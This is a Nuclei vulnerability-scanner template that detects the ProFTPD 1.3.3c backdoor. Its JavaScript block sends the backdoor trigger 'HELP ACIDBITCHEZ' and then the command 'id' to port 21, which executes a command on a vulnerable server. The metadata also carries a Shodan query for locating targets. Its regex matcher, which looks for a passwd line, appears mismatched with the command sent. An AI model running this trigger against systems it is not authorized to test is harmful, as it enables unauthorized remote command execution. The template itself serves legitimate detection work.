mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-02 08:43:27 +08:00
51 lines
1.4 KiB
YAML
51 lines
1.4 KiB
YAML
id: proftpd-backdoor
|
|
|
|
info:
|
|
name: ProFTPd-1.3.3c - Backdoor Command Execution
|
|
author: pussycat0x
|
|
severity: critical
|
|
description: |
|
|
This backdoor was present in the proftpd-1.3.3c.
|
|
reference:
|
|
- https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
|
|
- https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: "product:\"ProFTPD\""
|
|
tags: js,network,proftpd,ftp,backdoor
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isPortOpen(Host,Port);
|
|
code: |
|
|
const data = ["HELP ACIDBITCHEZ\n", "id"];
|
|
const c = require("nuclei/net");
|
|
let conn = c.Open('tcp', `${Host}:${Port}`);
|
|
let resp = conn.RecvFullString();
|
|
if (resp.includes("ProFTPD 1.3.3c"))
|
|
{
|
|
for (let i = 0; i < data.length; i++)
|
|
{
|
|
conn.Send(data[i]);
|
|
console.log('Sending:', data[i]);
|
|
let resp = conn.RecvFullString();
|
|
resp
|
|
}
|
|
} else
|
|
{
|
|
exit();
|
|
}
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 21
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "success == true"
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a0047304502204deeb7676e3bbce2a30f747f40105d6a6f267d77b233d601fb62e29970923c110221008c94d4e3d13c23c854b67ff899bc8904ad3bc98fd0e9d62b318b7a2ca70c45f8:922c64590222798bb761d5b6d8e72950 |